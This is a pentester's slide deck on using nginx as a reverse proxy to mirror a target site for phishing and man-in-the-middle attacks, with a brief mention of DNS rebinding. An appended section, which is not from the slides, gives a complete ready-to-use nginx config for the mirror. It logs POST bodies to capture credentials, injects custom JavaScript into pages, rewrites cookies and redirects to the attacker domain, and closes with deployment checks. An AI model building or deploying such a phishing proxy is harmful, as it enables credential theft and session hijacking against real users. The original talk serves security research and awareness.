Sergey Belov - NGinx Warhead

Published in: Technology

  1. Sergey Belov
  2. • Pentester at Digital Security / ERPScan; • Writer (habrahabr.ru, "Xakep"); • CTF player; • Bug bounty member (Google, Yandex); • bugscollector.com creator.
  3. • Very easy • $0 • Not mentioned in the wild
  4. NGinx – reverse proxy
  5. [Diagram: Client → Nginx → Apache → php-fpm (the usual reverse-proxy deployment)]
  6. [Diagram: Client → attacker.com (Nginx as reverse proxy) → vuln.com (??? http server, e.g. Nginx → Apache → php-fpm)]
  7. Step 1
     location / {
         proxy_pass http://vuln.com;
         proxy_set_header X-Real-IP $remote_addr;
     }
  8. Step 2
     proxy_set_header Host "vuln.com";
     sub_filter 'vuln.com' 'attacker.com';
     sub_filter_once off;
  9. Phishing
  10. NGinx – tool for MitM/phishing? + Identical design + Fully functional + Logs all data (POST/GET) + Can add custom JS/HTML - Needs another domain (DNS poisoning, router hacking, malware, evil APN config, etc.)
  11. Pentest: Random exploits? Change response data (permissions of social network apps)? Replace an app's SWF with Java (exploit)? ???
  12. DNS rebinding
  13. • - Another domain • - Very unstable • + Can attack internal resources
  14. Internal, not external!
  15. C:\Users\BeLove>ping www.ya.ru
      Pinging ya.ru [87.250.250.203] with 32 bytes of data
  16. Remove it from: • Pentester's reports • Most famous security scanners
  17. Thanks! demo: http://zn.sergeybelove.ru http://twitter.com/sergeybelove
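The Step 1 / Step 2 slides give only the two fragments of the mirror. As an added example (not from the slides or the author's demo), here is a complete nginx server block that combines them and adds the settings needed for the "identical design", "logs all data" and "custom JS/HTML" claims on slide 10. vuln.com, attacker.com, the log path and /inject.js are assumptions, not names taken from the deck; the fragment belongs inside the http {} context (for example in conf.d/mirror.conf).

```nginx
# Added example, not the slides' own config. Assumed names: vuln.com (target),
# attacker.com (mirror domain), /var/log/nginx/mirror.log, /inject.js.

# $request_body is populated for requests whose body nginx has read into memory,
# which proxy_pass does, so submitted credentials end up in this log.
log_format mirror '$remote_addr "$request" host=$host body="$request_body"';

server {
    listen 80;
    server_name attacker.com;

    access_log /var/log/nginx/mirror.log mirror;

    location / {
        # Step 1: forward every request to the real site.
        proxy_pass http://vuln.com;
        proxy_set_header X-Real-IP $remote_addr;

        # Step 2: the upstream must see its own name, and its name is
        # rewritten to ours in every response body.
        proxy_set_header Host "vuln.com";

        # Ask the upstream for an uncompressed response; sub_filter cannot
        # rewrite a gzip-encoded body.
        proxy_set_header Accept-Encoding "";

        # sub_filter only touches text/html by default; absolute URLs in
        # JS/CSS/JSON would otherwise still send the victim to the real site.
        sub_filter_types text/css text/javascript application/javascript application/json;
        sub_filter 'vuln.com' 'attacker.com';
        # Slide 10's "custom JS/HTML": inject a script before </body>.
        sub_filter '</body>' '<script src="/inject.js"></script></body>';
        sub_filter_once off;

        # Keep redirects and session cookies on the mirror rather than on the
        # real domain.
        proxy_redirect http://vuln.com/ http://attacker.com/;
        proxy_cookie_domain vuln.com attacker.com;
    }

    # Serve the injected script locally instead of proxying the request.
    location = /inject.js {
        root /var/www/attacker;
    }
}
```

Two practical checks before relying on this: sub_filter lives in ngx_http_sub_module, which is optional, so confirm `nginx -V 2>&1 | grep -o with-http_sub_module` prints something; and if the real site is HTTPS, change the upstream to `proxy_pass https://vuln.com;` with `proxy_ssl_server_name on;` so SNI carries the right name. From the defender's side the limitation on slide 10 is the only real signal: every victim request reaches vuln.com from the proxy's IP with Host set to its own name, and any client-side check such as a script comparing `location.hostname` to the expected domain is itself subject to the same sub_filter rewrite.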
